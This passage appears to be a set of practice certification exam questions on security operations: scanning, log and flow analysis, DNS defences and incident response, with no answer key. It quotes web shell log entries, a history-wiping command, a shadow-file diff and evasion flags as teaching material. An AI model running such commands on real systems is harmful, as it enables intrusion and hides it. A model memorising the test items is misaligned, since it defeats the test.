[ 21/Jul/2017:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[ 21/Jul/2017:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0

1. A denial-of-service attack
2. A vulnerability scan
3. A port scan
4. A directory traversal attack

Charles received a pcap file from a system administrator at a remote site who was concerned about the traffic it showed. What type of behavior should Charles report after his analysis of the file?

1. A DOS attack
2. Port scanning
3. A DDoS attack
4. Service access issues

Susan is reviewing files on a Windows workstation and believes that cmd.exe has been replaced with a malware package. Which of the following is the best way to validate her theory?

1. Submit cmd.exe to VirusTotal.
2. Compare the hash of cmd.exe to a known good version.
3. Check the file using the National Software Reference Library.
4. Run cmd.exe to make sure its behavior is normal.

What U.S. government program seeks to provide trusted sources that meet the following requirements?

• Provide a chain of custody for classified and unclassified integrated circuits
• Ensure that there will not be any reasonable threats related to supply disruption
• Prevent intentional or unintentional modification or tampering of integrated circuits
• Protect integrated circuits from reverse engineering and vulnerability testing

1. Trusted Foundry
2. Chain of Custody
3. Trusted Suppliers
4. Trusted Access Program

While reviewing netflows for a system on her network, Alice discovers the following traffic pattern. What is occurring?

Date flow start   Duration      Proto   Src    IP Addr:Port->Dst IP Addr:Port     Packets   Bytes   Flows
2017-07-11        04:59:32.934  0.000   TCP    10.1.1.1:34543->10.2.2.6:22        1         60      1
2017-07-11        04:59:39.730  0.000   TCP    10.1.1.1:34544->10.2.2.7:22        1         60      1
2017-07-11        04:59:46.166  0.000   TCP    10.1.1.1:34545->10.2.2.8:22        1         60      1
2017-07-11        04:59:52.934  0.000   TCP    10.1.1.1:34546->10.2.2.9:22        1         60      1
2017-07-11        05:00:06.710  0.000   TCP    10.1.1.1:34547->10.2.2.10:22       1         60      1
2017-07-11        05:00:46.160  0.000   TCP    10.1.1.1:34548->10.2.2.11:22       1         60      1
2017-07-11        05:01:32.834  0.000   TCP    10.1.1.1:34549->10.2.2.12:22       1         60      1
2017-07-11        05:01:39.430  0.000   TCP    10.1.1.1:34550->10.2.2.13:22       1         60      1
2017-07-11        05:01:46.676  0.000   TCP    10.1.1.1:34551->10.2.2.14:22       1         60      1

1. telnet scan
2. ssh scan
3. ssh scan with unsuccessful connection attempts
4. sftp scan with unsuccessful connection attempts

Chris wants to gather as much information as he can about an organization using DNS harvesting techniques. Which of the following methods will most easily provide the most useful information if they are all possible to conduct on the network he is targeting?

1. DNS record enumeration
2. Zone transfer
3. Reverse lookup
4. Domain brute forcing

The national insurance company that Luke works for has experienced a breach, and Luke is attempting to categorize the impact. As he reviews the incident report, he notes that customer data that included Social Security numbers was exfiltrated from the organization. How should he categorize the impact?

1. As a regulated information breach
2. As an intellectual property breach
3. As a confidential information breach
4. As an integrity loss

As part of his reconnaissance effort, Chris enters usernames from public information about a company into a site like checkusernames.com and receives information like the results shown here. What type of action is he performing?

1. Social engineering
2. Brute-force username guessing
3. Social media profiling
4. Phishing

Geoff wants to perform passive reconnaissance as part of an evaluation of his organization’s security controls. Which of the following techniques is a valid technique to perform as part of a passive DNS assessment?

1. A DNS forward or reverse lookup
2. A zone transfer
3. A WHOIS query
4. Using maltego

Mike’s penetration test requires him to use passive mapping techniques to discover network topology. Which of the following tools is best suited to that task?

1. Wireshark
2. nmap
3. netcat
4. Angry IP Scanner

Geoff has been asked to identify a technical solution that will reduce the risk of captured or stolen passwords being used to allow access to his organization’s systems. Which of the following technologies should he recommend?

1. Captive portals
2. Multifactor authentication
3. VPNs
4. OAuth

While gathering DNS information about an organization, Chris discovered multiple AAAA records. What type of reconnaissance does this mean Chris may want to consider?

1. Second-level DNS queries
2. IPv6 scans
3. Cross-domain resolution
4. A CNAME verification

Sharon wants to gather email addresses as part of her reconnaissance efforts. Which of the following tools best suits her needs?

1. nmap
2. cree.py
3. MailSnarf

4. TheHarvester

After Charles completes a topology discovery scan of his local network, he sees the Zenmap topology shown here. What can Charles determine from the Zenmap topology view?

1. There are five hosts with port security enabled.
2. DemoHost2 is running a firewall.
3. DemoHost4 is running a firewall.
4. There are four hosts with vulnerabilities and seven hosts that do not have vulnerabilities.

Which of the following items is not one of the three important rules that should be established before a penetration test?

1. Timing
2. Reporting
3. Scope
4. Authorization

Scott is part of the white team who is overseeing his organization’s internal red and blue teams during an exercise that requires each team to only perform actions appropriate to the penetration test phase they are in. During the reconnaissance phase, he notes the following behavior as part of a Wireshark capture. What should he report?

1. The blue team has succeeded.
2. The red team is violating the rules of engagement.
3. The red team has succeeded.
4. The blue team is violating the rules of engagement.

Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with. She discovers that a host with IP address 10.11.140.13 is running services on TCP ports 636 and 443. What services is that system most likely running?

1. LDAPS and HTTPS
2. FTPS and HTTPS
3. RDP and HTTPS
4. HTTP and Secure DNS

Lauren inputs the following command on a Linux system:

#echo 127.0.0.1 example.com >> /etc/hosts

What has she done?

1. She has added the system to the allowed hosts file.
2. She has routed traffic for the example.com domain to the local host.
3. She has routed local host traffic to example.com.
4. She has overwritten the hosts file and will have deleted all data except this entry.

While reviewing Apache logs, Cynthia notices the following log entries. What has occurred?

10.0.1.1 - POST /wordpress/wp-content/r57.php?1 200
10.0.1.1 - GET /wordpress/wp-content/r57.php 200

1. A file was downloaded and verified.
2. A file was emailed.
3. A file was moved to the wp-content directory.
4. A file was uploaded and verified.

Rhonda has identified a privilege escalation flaw on the system she targeted in the first phase of her penetration test and is now ready to take the next step. According to the NIST 800-115 standard, what is step C that Rhonda needs to take, as shown in this diagram?

1. System browsing
2. Scanning
3. Rooting
4. Consolidation

While conducting a penetration test, Ben executes the following command:

ifconfig eth0 hw ether 08:00:27:06:d4

What network protection is Ben most likely attempting to avoid?

1. Port security
2. NAC
3. A firewall
4. An IPS

When Scott performs an nmap scan with the -T flag set to 5, what variable is he changing?

1. How fast the scan runs
2. The TCP timeout flag it will set
3. How many retries it will perform
4. How long the scan will take to start up

While conducting a port scan of a remote system, Henry discovers TCP port 1433 open. What service can he typically expect to run on this port?

1. Oracle
2. VNC
3. IRC
4. Microsoft SQL

Every year, Alice downloads and reads a security industry published list of all the types of attacks, compromises, and malware events that have occurred, that are becoming more prevalent, and that are decreasing in occurrence. What type of analysis can she perform using this information?

1. Anomaly
2. Trend
3. Heuristic
4. Availability

While application vulnerability scanning one of her target organizations web servers, Andrea notices that the server’s hostname is resolving to a cloudflare.com host. What does Andrea know about her scan?

1. It is being treated like a DDoS attack.
2. It is scanning a CDN-hosted copy of the site.
3. It will not return useful information.
4. She cannot determine anything about the site based on this information.

While conducting active reconnaissance, Lauren discovers a web remote management application that appears to allow Windows command-line access on a server. What command can she run to quickly determine what user the service is running as?

1. username
2. showuser
3. whoami
4. cd c:Users\%currentuser

While tracking a potential APT on her network, Cynthia discovers a network flow for her company’s central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?

Date flow start     Duration Proto          Src   IP Addr:Port   Dst IP Addr:Port   Packets    Bytes    Flows 
2017-07-11          13:06:46.343 21601804   TCP   10.1.1.1:1151->10.2.2.3:443       9473640    9.1 G    1
2017-07-11          13:06:46.551 21601804   TCP   10.2.2.3:443->10.1.1.1:1151       8345101    514 M    1

1. A web browsing session
2. Data exfiltration
3. Data infiltration
4. A vulnerability scan

Chris wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Chris accomplish this for Windows 10 Pro workstations?

1. Using application whitelisting to prevent all unallowed programs from running
2. Using Windows Defender and adding the game to the blacklist file
3. By listing it in the Blocked Programs list via secpol.msc
4. You cannot blacklist applications in Windows 10 without a third-party application.

After a series of compromised accounts led to her domain being blacklisted, Lauren has been asked to restore her company’s email as quickly as possible. Which of the following options is not a valid way to allow her company to send email successfully?

1. Migrate her company’s SMTP servers to new IP addresses.
2. Migrate to a cloud email hosting provider.
3. Change SMTP headers to prevent blacklisting.
4. Work with the blacklisting organizations to get removed from the list.

Part of Tracy’s penetration testing assignment is to evaluate the WPA2 Enterprise protected wireless networks of her target organization. What major differences exist between reconnaissance of a wired network versus a wireless network?

1. Encryption and physical accessibility
2. Network access control and encryption
3. Port security and physical accessibility
4. Authentication and encryption

Ian’s company has an internal policy requiring that they perform regular port scans of all of their servers. Ian has been part of a recent effort to move his organization’s servers to an infrastructure as a service provider. What change will Ian most likely need to make to his scanning efforts?

1. Change scanning software.
2. Follow the service provider’s scan policies.
3. Sign a security contract with the provider.
4. Discontinue port scanning.

During a regularly scheduled PCI compliance scan, Fred has discovered port 3389 open on one of the point-of-sale terminals that he is responsible for managing. What service should he expect to find enabled on the system?

1. MySQL
2. RDP
3. TOR
4. Jabber

Cynthia knows that the organization she is scanning runs services on alternate ports to attempt to reduce scans of default ports. As part of her intelligence-gathering process, she discovers services running on ports 8080 and 8443. What services are most likely running on these ports?

1. Botnet C&C
2. Nginx
3. Microsoft SQL Server instances
4. Web servers

Lauren wants to identify all the printers on the subnets she is scanning with nmap. Which of the following nmap commands will not provide her with a list of likely printers?

1. nmap -sS -p 9100,515,631 10.0.10.15/22 -oX printers.txt
2. nmap -O 10.0.10.15/22 -oG - | grep printer >> printers.txt
3. nmap -sU -p 9100,515,631 10.0.10.15/22 -oX printers.txt
4. nmap -sS -O 10.0.10.15/22 -oG | grep >> printers.txt

Chris knows that systems have connected to a remote host on TCP ports 1433 and 1434. If he has no other data, what should his best guess be about what the host is?

1. A print server
2. A Microsoft SQL server
3. A MySQL server
4. A secure web server running on an alternate port

What services will the following nmap scan test for?

nmap -sV -p 22,25,53,389 192.168.2.50/27

1. telnet, SMTP, DHCP, MS-SQL
2. ssh, SMTP, DNS, LDAP
3. telnet, SNMP, DNS, LDAP
4. ssh, SNMP, DNS, RDP

While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?

> root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
> daemon:*:16820:0:99999:7:::
> bin:*:16820:0:99999:7:::
> sys:*:16820:0:99999:7:::
> sync:*:16820:0:99999:7:::
> games:*:16820:0:99999:7:::
> man:*:16820:0:99999:7:::
> lp:*:16820:0:99999:7:::
> mail:*:16820:0:99999:7:::
> news:*:16820:0:99999:7:::
> uucp:*:16820:0:99999:7:::
> proxy:*:16820:0:99999:7:::
> www-data:*:16820:0:99999:7:::
> backup:*:16820:0:99999:7:::
> list:*:16820:0:99999:7:::
> irc:*:16820:0:99999:7:::

1. The root account has been compromised.
2. An account named daemon has been added.
3. The shadow password file has been modified.
4. /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.

While conducting a topology scan of a remote web server, Susan notes that the IP addresses returned for the same DNS entry change over time. What has she likely encountered?

1. A route change
2. Fast flux DNS
3. A load balancer
4. An IP mismatch

Attackers have been attempting to log into Alaina’s Cisco routers, causing thousands of log entries, and she is worried they may eventually succeed. Which of the following options should she recommend to resolve this issue?

1. Prevent console login via ssh.
2. Implement a login-block feature with back-off settings.
3. Move the administrative interface to a protected network.
4. Disable console access entirely.

Ron is reviewing his team’s work as part of a reconnaissance effort and is checking Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue should he identify with their scan based on the capture shown here?

1. The host was not up.
2. Not all ports were scanned.
3. The scan scanned only UDP ports.
4. The scan was not run as root.

John needs to protect his organization’s authentication system against brute-force attacks. Which of the following control pairs are best suited to preventing a brute-force attack from succeeding if ease of use and maintenance is also important?

1. Passwords and PINs
2. Passwords and biometrics
3. Passwords and token-based authentication
4. Token-based authentication and biometrics

While reviewing the command history for an administrative user, Chris discovers a suspicious command that was captured, shown here:

ln /dev/null ~/.bash_history

What action was this user attempting to perform?

1. Enabling the bash history
2. Appending the contents of /dev/null to the bash history
3. Logging all shell commands to /dev/null
4. Allowing remote access from the null shell

While attempting to stop a rogue service, Monica issues the following Linux command on an Ubuntu system using upstart:

service rogueservice stop

After a reboot, she discovers the service running again. What happened, and what does she need to do to prevent this?

1. The service restarted at reboot; she needs to include the "-p", or permanent flag.
2. The service restarted itself; she needs to delete the binary associated with the service.
3. The service restarted at reboot; she should add an .override file to stop the service from starting.
4. A malicious user restarted the service; she needs to ensure users cannot restart services.

Lucca wants to validate DNS responses to ensure that they are from authoritative DNS servers. What technology can he use to do this?

1. DNSSEC
2. DNSCrypt
3. DNShield
4. DNS is an open protocol and does not support secure validation.

Nathan has been asked to monitor and manage the environment in which a cybersecurity exercise is conducted. What team is he on?

1. Red team
2. White team
3. Blue team
4. Black team

Allan’s nmap scan includes a line that starts with cpe:/o. What type of information should he expect to gather from the entry?

1. Common privilege escalation
2. Operating system
3. Certificate performance evaluation
4. Hardware identification

Which of the following items is not typically included in the rules of engagement for a penetration test?

1. Timing
2. Authorization
3. Scope
4. Authorized tools

Isaac wants to prevent hosts from connecting to known malware distribution domains. What type of solution can he use to do this without deploying endpoint protection software or an IPS?

1. Route poisoning
2. Anti-malware router filters
3. Subdomain whitelisting
4. DNS blackholing

While scanning a network, Frank discovers a host running a service on TCP ports 1812 and 1813. What type of server has Frank most likely discovered?

1. RADIUS
2. VNC
3. Kerberos
4. Postgres

While reviewing output from netstat, John sees the following output. What should his next action be?

[minesweeper.exe]
  TCP    127.0.0.1:62522        dynamo:0               LISTENING
[minesweeper.exe]
  TCP    192.168.1.100        151.101.2.69:https           ESTABLISHED

1. Capture traffic to 151.101.2.69 using Wireshark.
2. Initiate the organization’s incident response plan.
3. Check to see whether 151.101.2.69 is a valid Microsoft address.
4. Ignore it, because this is a false positive.

Shane wants to conduct an nmap scan of a firewalled subnet. Which of the following is not an nmap firewall evasion technique he could use?

1. Fragmenting packets
2. Changing packet header flags
3. Spoofing the source IP
4. Appending random data

Alex is observing a penetration tester who has gained access to a Windows domain controller. The penetration tester runs a program called fgdump and gathers information from the system. What type of information has the penetration tester targeted?

1. File and group information
2. Password and usernames
3. Active Directory full GPO lists
4. Nothing, because FGDump is a Linux tool.

Which of the following commands will provide Ben with the most information about a host?

1. dig -x [ip address]
2. host [ip address]
3. nslookup [ip address]
4. zonet [ip address]

Selah suspects that the Linux system she has just logged into may be Trojaned and wants to check where the bash shell she is running is being executed from. What command should she run to determine this?

1. where bash
2. ls -l bash
3. which bash
4. printenv bash

Adam needs to provide ssh access to systems behind his data center firewall. If Adam’s organization uses the system architecture shown here, what is the system at point A called?

1. A firewall-hopper
2. An isolated system
3. A moat-protected host
4. A jump box

Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11?

1. iptables -A OUTPUT -d 10.24.31.11 -j DROP
2. iptables -A INPUT -d 10.24.31.11 -j ADD
3. iptables -block -host 10.24.31.11 -j DROP
4. iptables -block -ip 10.24.31.11 -j ADD

Fred’s reconnaissance of an organization includes a search of the Censys network search engine. There, he discovers multiple certificates with validity dates as shown here:

Validity

2016-07-07 00:00:00to 2017-08-11 23:59:59 (400 days, 23:59:59)

2016-07-08 00:00:00to 2017-08-12 23:59:59 (400 days, 23:59:59)

2017-07-11 00:00:00to 2018-08-15 23:59:59 (400 days, 23:59:59)

What should Fred record in his reconnaissance notes?

1. The certificates expired as expected, showing proper business practice.
2. The certificates were expired by the CA, possibly due to nonpayment.
3. The system that hosts the certificates may have been compromised.
4. The CA may have been compromised, leading to certificate expiration.

After receiving a penetration test report, Rick has decided to implement anti-harvesting techniques for his organization’s DNS. Which of the following sets of techniques is best suited to preventing bulk and automated information gathering?

1. CAPTCHA and proxy services
2. Rate limiting and CAPTCHA
3. Not publishing TLD zone files and blacklisting
4. CAPTCHA and blacklisting

When Casey scanned a network host, she received the results shown here. What does she know based on the scan results?

1. The device is a Cisco device.
2. The device is running CentOS.
3. The device was built by IBM.
4. None of the above

What is a document that lists sensitive data-handling rules, contact information, black-box testing, and status meeting schedules called during a penetration test?

1. The “get out of jail free” card
2. The rules of engagement
3. Executive sign-off
4. A penetration test standard

Fred conducts an SNMP sweep of a target organization and receives no-response replies from multiple addresses that he believes belong to active hosts. What does this mean?

1. The machines are unreachable.
2. The machines are not running SNMP servers.
3. The community string he used is invalid.
4. Any or all of the above may be true.

Angela wants to gather detailed information about the hosts on a network passively. If she has access to a Wireshark pcap file from the network, which of the following tools can she use to provide automated analysis of the file?

1. ettercap
2. NetworkMiner
3. Sharkbait
4. dradis

Rick’s security research company wants to gather data about current attacks and sets up a number of intentionally vulnerable systems that allow his team to log and analyze exploits and attack tools. What type of environment has Rick set up?

1. A tarpit
2. A honeypot
3. A honeynet
4. A blackhole

While performing reconnaissance of an organization’s network, Angela discovers that web.organization.com, www.organization.com, and documents.organization.com all point to the same host. What type of DNS record allows this?

1. A CNAME
2. An MX record
3. An SPF record
4. An SOA record

Susan wants to prevent attackers from running specific files and also wants to lock down other parts of the Windows operating system to limit the impact of attackers who have access to workstations she is responsible for. If she wants to do this on Windows 10 workstations, what tool should she use?

1. Secpol.msc
2. FileVault
3. AppLocker

While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:

Aug  6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1  user=root
Aug  6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 > 3
Aug  6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug  6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug  6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]

Which of the following has not occurred?

1. A user has attempted to re-authenticate too many times.
2. PAM is configured for three retries and will reject any additional retries in the same session.
3. Fail2ban has blocked the ssh login attempts.
4. Root is attempting to log in via ssh from the local host.

Chris operates the point-of-sale network for a company that accepts credit cards and is thus required to be compliant with PCI-DSS. During his regular assessment of the point-of-sale terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris’s best option to stay compliant with PCI-DSS and protect his vulnerable systems?

1. Replace the Windows embedded point-of-sale terminals with standard Windows systems.
2. Build a custom operating system image that includes the patch.
3. Identify, implement, and document compensating controls.
4. Remove the POS terminals from the network until the vendor releases a patch.

Senior management in Adam’s company recently read a number of articles about massive ransomware attacks that successfully targeted organizations like the one that Adam is a part of. Adam’s organization already uses layered security solutions including a border IPS, firewalls between network zones, local host firewalls, antivirus software, and a configuration management system that applies recommended operating system best practice settings to their workstations. What should Adam recommend to minimize the impact of a similar ransomware outbreak at his organization?

1. Honeypots
2. Backups
3. Anti-malware software
4. A next-generation firewall appliance

Which of the following tools is not typically associated with the reconnaissance phase of a penetration test?

1. Metasploit
2. nmap
3. Nessus
4. Maltego

What occurs when Alex uses the following command to perform an nmap scan of a network?

nmap -sP 192.168.2.0/24

1. A secure port scan of all hosts in the 192.168.0.0 to 192.168.2.255 network range
2. A scan of all hosts that respond to ping in the 192.168.0.0 to 192.168.255.255 network range
3. A scan of all hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 network range
4. A SYN-based portscan of all hosts in the 192.168.2.0 to 192.168.2.255 network range

As part of her malware analysis process, Kara builds a diagram of the components of the suspected malware package. At each stage, she unpacks, de-obfuscates, and identifies each subcomponent, adding it to her diagram. What is this process known as?

1. Decomposition
2. Disassembly
3. Reverse archiving
4. Fingerprinting

Aubrey is reviewing her firewall logs for signs of attacks in her role as a blue team member during a penetration test. Which of the following types of attack is she least likely to be able to identify using a stateful packet inspection firewall?

1. A SYN flood
2. A SQL injection attack
3. A port scan
4. A DDoS attack

Geoff’s remote scans of a target organization’s class C network block using nmap (nmap -sS 10.0.10.1/24) show only a single web server. If Geoff needs to gather additional reconnaissance information about the organization’s network, which of the following scanning techniques is most likely to provide additional detail?

1. Use a UDP scan.
2. Perform a scan from on-site.
3. Scan using the -p 1-65535 flag.
4. Use nmap’s IPS evasion techniques.

During her normal daily review process, Jennifer detects an external system that is systematically conducting traceroute operations to each of the systems and devices in her network. What activity is most likely occurring?

1. A regularly scheduled network scan from her company’s ISP
2. A vulnerability scan
3. Network topology reconnaissance
4. Router probes to determine the best routes via BGP discovery

Why does the U.S. government require Trusted Foundry and related requirements for technology?

1. To control prices
2. To ensure standards compatibility
3. To prevent hardware-level compromise of devices
4. To ensure U.S.-based supplier viability for strategic components

As part of an externally accessible information review by their security team, Bob and Lisa receive information that the security team gathered including the following entry:

Query Results:
Router: Ashburn, VA - US
Command: show bgp ipv4 unicast 10.81.254.195 
BGP routing table entry for 10.64.0.0/11
Versions:
  Process           bRIB/RIB  SendTblVer
  Speaker          287479994   287479994
Last Modified: Feb 22 09:16:16.154 for 8w0d
Paths: (13 available, best #13)
  Advertised to update-groups (with more than one peer):
    0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45 
  Advertised to peers (in unique update groups):
    10.250.31.182  
  Path #1: Received by speaker 0
  Not advertised to any peer
  7922
    10.242.151.65 (metric 6710) from  (129.250.0.162)
      Origin IGP, metric 4294967294, localpref 98, valid, confed-internal
      Received Path ID 0, Local Path ID 0, version 0
      Community: 2914:390 2914:1006 2914:2000 2914:3000 65504:7922
      Originator: 10.250.0.162, Cluster list: 10.250.0.9
    ....
 Path #13: Received by speaker 0
  Advertised to update-groups (with more than one peer):
    0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45 
  Advertised to peers (in unique update groups):
    10.250.31.182  
  7922

What type of tool could they use to gather this publicly available information about their systems in the future?

1. nmap
2. A BGP looking glass
3. A BGP reflector
4. A route/path assimilator

A system that Jeff is responsible for has been experiencing consistent denial-of-service attacks using a version of the Low Orbit Ion Cannon (LOIC) that leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Jeff use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem?

1. IP-based blacklisting
2. Drop all SYN packets.
3. Use a connection rate or volume-limiting filter per IP.
4. Use a route-blocking filter that analyzes common LOIC routes.

Chris wants to limit the ability of attackers to conduct passive fingerprinting exercises on his network. Which of the following practices will help to mitigate this risk?

1. Implement an IPS.
2. Implement a firewall.
3. Disable promiscuous mode for NICs.
4. Enable promiscuous mode for NICs.

Geoff wants to gather a list of all Windows services and their current state using a command-line tool. What tool can he use to gather this information for later processing?

1. svcctl -l
2. service list
3. service -l
4. sc query

While reviewing Shodan scan data for his organization, Adam finds the following information. What type of system has he discovered?

1. A botnet administration system
2. A control and data acquisition system
3. A noncaching web server

4. A NAS

Use the following scenario and image to answer the following three questions:

• While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the following information:

  

What issue should Amanda report to the system administrator?

1. High network utilization
2. High memory utilization
3. Insufficient swap space
4. High CPU utilization

What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?

1. ps
2. top
3. proc
4. load

What command can Amanda use to terminate the process?

1. term
2. stop
3. end
4. kill

During Geoff’s configuration of his organization’s network access control policies, he sets up client OS rules that include the following statements:

ALLOW Windows 7 version *, Windows 10 version *
ALLOW OSX version *
ALLOW iOS 8.1, iOS 9 version *
ALLOW Android 7.*

After deploying this rule, he discovers that many devices on his network cannot connect. What issue is most likely occurring?

1. Insecure clients
2. Incorrect NAC client versions
3. OS version mismatch
4. Patch-level mismatch

Lauren submits a suspected malware file to malwr.com and receives the following information about its behavior. What type of tool is malwr.com?

1. A reverse-engineering tool
2. A static analysis sandbox
3. A dynamic analysis sandbox
4. A decompiler sandbox

Fred has been tasked with configuring his organization’s NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user’s job?

1. Time-based
2. Rule-based
3. Role-based
4. Location-based

Charles is investigating a process that he believes may be malicious. What Linux command can he use to determine what files that process has open?

1. ps
2. procmap
3. lsof
4. filemap

After a popular website is hacked, Chris begins to hear reports that email addresses from his company’s domain are listed in the hacker’s data dump. Chris knows that the list includes passwords and is concerned that his users may have used the same password for the site and their own company account. If the hackers recovered MD5 hashed passwords, how can he check them against the strong password hashes his company uses?

1. Reverse the MD5 hashes and then rehash using the company’s method and compare.
2. Reverse the MD5 and strong company hashes and then compare the password.
3. Use rainbow tables to recover the passwords from the dump and then rehash using the company’s strong method and compare.
4. Chris cannot accomplish this task; hashes cannot be reversed.

As part of his active reconnaissance activities, Frank is provided with a shell account accessible via ssh. If Frank wants to run a default nmap scan on the network behind the firewall shown here, how can he accomplish this?

1. ssh -t 192.168.34.11 nmap 192.168.34.0/24
2. ssh -R 8080:192.168.34.11:8080 [remote account:remote password]
3. ssh -proxy 192.168.11 [remote account:remote password]
4. Frank cannot scan multiple ports with a single ssh command.

Angela captured the following packets during a reconnaissance effort run by her organization’s red team. What type of information are they looking for?

1. Vulnerable web applications
2. SQL injection
3. Directory traversal attacks
4. Passwords

Which sources are most commonly used to gather information about technologies a target organization uses during intelligence gathering?

1. OSINT searches of support forums and social engineering
2. Port scanning and social engineering
3. Social media review and document metadata
4. Social engineering and document metadata

Geoff wants to prevent spammers from harvesting his organization’s public LDAP directory. What technology should he implement?

1. A firewall
2. An IDS
3. Set hard limits
4. Require authentication

How can Saria remediate the issue shown here in the MBSA screenshot?

1. Force all users to set a complex password.
2. Set a minimum password age.
3. Enforce password expiration.
4. This is not a problem.

Greg configures his next-generation firewall security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Greg controls that advises them they were prevented from visiting a malicious site. What is this technique known as?

1. DNS masquerading
2. DNS sinkholing
3. DNS re-sequencing
4. DNS hierarchy revision

While reviewing a malware sample, Adam discovers that code inside of it appears to be obfuscated. Which of the following encoding methods is commonly used to prevent code from being easily read by simply opening the file?

1. QR coding
2. Base64
3. Base128
4. XINT

Jennifer is an Active Directory domain administrator for her company and knows that a quickly spreading botnet relies on a series of domain names for command and control and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command-and-control systems?

1. Force a BGP update.
2. Set up a DNS sinkhole.
3. Modify the hosts file.
4. Install an anti-malware application.

Charleen works for a U.S. government contractor that uses NIST’s definitions to describe threat categories. How should she categorize the threat posed by competitors that might seek to compromise her organization’s website?

1. Adversarial
2. Accidental
3. Structural
4. Environmental

Chris has been asked to assess the technical impact of suspected reconnaissance performed against his organization. He is informed that a reliable source has discovered that a third party has been performing reconnaissance by querying WHOIS data. How should Chris categorize the technical impact of this type of reconnaissance?

1. High
2. Medium
3. Low
4. He cannot determine this from the information given.

Frank is creating the scope worksheet for his organization’s penetration test. Which of the following techniques is not typically included in a penetration test?

1. Reverse engineering
2. Social engineering
3. Denial-of-service attacks
4. Physical penetration attempts

Allan needs to immediately shut down a service called Explorer.exe on a Windows server. Which of the following methods is not a viable option for him?

1. Use sc.
2. Use wmic.
3. Use secpol.msc.
4. Use services.msc.

Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing?

ICMP "Echo request"
Date flow start   Duration       Proto         Src IP Addr:Port->Dst IP Addr:Port   Packets   Bytes   Flows
2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.6:8.0             11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.6:0->10.1.1.1:0.0             11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.7:8.0             11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.7:0->10.1.1.1:0.0             11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.8:8.0             11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.8:0->10.1.1.1:0.0             11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.9:8.0             11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.9:0->10.1.1.1:0.0             11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.10:8.0            11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.10:0->10.1.1.1:0.0            11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.6:11.0            11        924     1
2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.11:0->10.1.1.1:0.0            11        924     1

1. A port scan
2. A failed three-way handshake
3. A ping sweep
4. A traceroute

Ryan’s passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4?

1. The host does not have a DNS entry.
2. It is running a service on port 139.
3. It is running a service on port 445.
4. It is a Windows system.

Stacey encountered a system that shows as “filtered” and “firewalled” during an nmap scan. Which of the following techniques should she not consider as she is planning her next scan?

1. Packet fragmentation
2. Spoofing the source address
3. Using decoy scans
4. Spoofing the destination address

When Charleen attempts to visit a website, she receives a DNS response from the DNS cache server that her organization relies on that points to the wrong IP address. What attack has occurred?

1. DNS brute forcing
2. ARP spoofing
3. DNS poisoning
4. MAC spoofing

Alex has been asked to implement network controls to ensure that users who authenticate to the network are physically in the building that the network they are authenticating to serves. What technology and tool should he use to do this?

1. Geo-IP and port security
2. GPS location and NAC
3. GPS location and port-security
4. Geo-IP and NAC

As part of a penetration testing exercise, Lauren is placed on the defending team for her organization. What is this team often called?

1. The red team
2. The white team
3. The blue team
4. The yellow team

Lucca wants to lock down a Cisco router, and chooses to use documentation that Cisco provides. What type of documentation is this?

1. Primary documentation
2. OEM documentation
3. Crowd-sourced documentation
4. System documentation